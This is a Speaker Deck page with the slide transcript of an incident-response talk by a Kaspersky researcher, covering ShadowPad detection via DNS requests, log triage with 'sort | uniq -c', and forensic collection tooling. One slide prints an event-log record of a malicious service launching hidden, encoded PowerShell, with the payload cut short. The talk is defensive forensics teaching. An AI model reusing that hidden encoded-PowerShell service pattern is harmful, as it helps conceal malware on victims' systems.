Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=47 DC7499
February 10, 2018
Education
0
300

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=128

DC7499

February 10, 2018
Tweet

More Decks by DC7499

See All by DC7499
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
170
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
140
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
210
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
190
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
150
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
170
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
260
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
300
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
360

Other Decks in Education

See All in Education
0dd6a21a46a84d9636a335a3f17c68b5?s=48 jorourke
0
590
18cdb6f294c8cb10a46167e462c2a51f?s=48 matleenalaakso
0
2.5k
7de49e20d3fff780f9ebe13a842f8062?s=48 willmaehon
0
770
18cdb6f294c8cb10a46167e462c2a51f?s=48 matleenalaakso
0
720
0f2a473c07602f3dd53c5ed0de0c56b5?s=48 danielkatz
PRO
0
1.5k
Fffb9af58e08cf384f2a8c1c40c3d38d?s=48 yasulab
2
1.7k
Dfd28fa0071caa23b7cdd3e7cfef8785?s=48 hanazukin
0
140
Bac20b7719109838d6be162a560272a0?s=48 uranoken
0
170
15d05906370266398f014184d86d17c5?s=48 cyber_unfold
1
950
C0390e8b11079f8761c0cd3274ed61cb?s=48 productmarketing
1
110
13e0500d2721da6352a312b77b98c4f6?s=48 utokyoissr2360
0
110
E2cf334c8ea8452a467efc8a0c64d883?s=48 shigeki
2
1.2k

Featured

See All Featured
053e75a5b48b44d6dd0612795dfb326d?s=48 notwaldorf
26
2.2k
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
54
4.4k
016edace78ffe826f2348d1e0c504afd?s=48 maggiecrowley
10
590
1519587b1a0febb658c36c94f6272b0d?s=48 roundedbygravity
84
7.9k
8ec1383b240b5ba15ffb9743fceb3c0e?s=48 philnash
11
740
3ab1249be442027903e1180025340b3f?s=48 reverentgeek
28
2.1k
A16eb159db895e3b01d3dc95767ad595?s=48 jonyablonski
25
1.4k
A0517b08532aec8ab2aae3f65d40ad86?s=48 hannesfritz
29
990
761be20b5ebd271008bcee1244fc5b52?s=48 matthewcrist
73
7.6k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
12
1.8k
462dad0dd24c568a32dcdb0ae895ae1b?s=48 rasmusluckow
318
19k
44b54d2ffcb7857004071cc6795dde11?s=48 cassininazir
347
20k

Transcript

  1. Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky

    Lab

  2. Challenge: find a SDC bus speed

  3. None

  4. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  5. 1.Shadowpad

  6. Case overview: 1.Antifraud system in a bank is detecting printing

    of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…

  7. DNS requests

  8. None
  9. None

  10. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

  11. https://securelist.com/shadowpad -in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2.0x403AA91EE

  17. Case overview:

  18. None
  19. None

  20. How to find suspicion DNS requests? sort | uniq -c

    | sort -rn

  21. How to find suspicion powershell? sort | uniq -c |

    sort -rn

  22. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA

  23. https://github.com/KasperskyLab/ForensicsTools/

  24. 3.Scanner2

  25. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!

  26. What to do? we need logs we need mfts we

    need regs

  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicion ? sort | uniq -c

    | sort -rn

  30. https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.

  33. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  34. Зачем?

  35. None

  36. Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab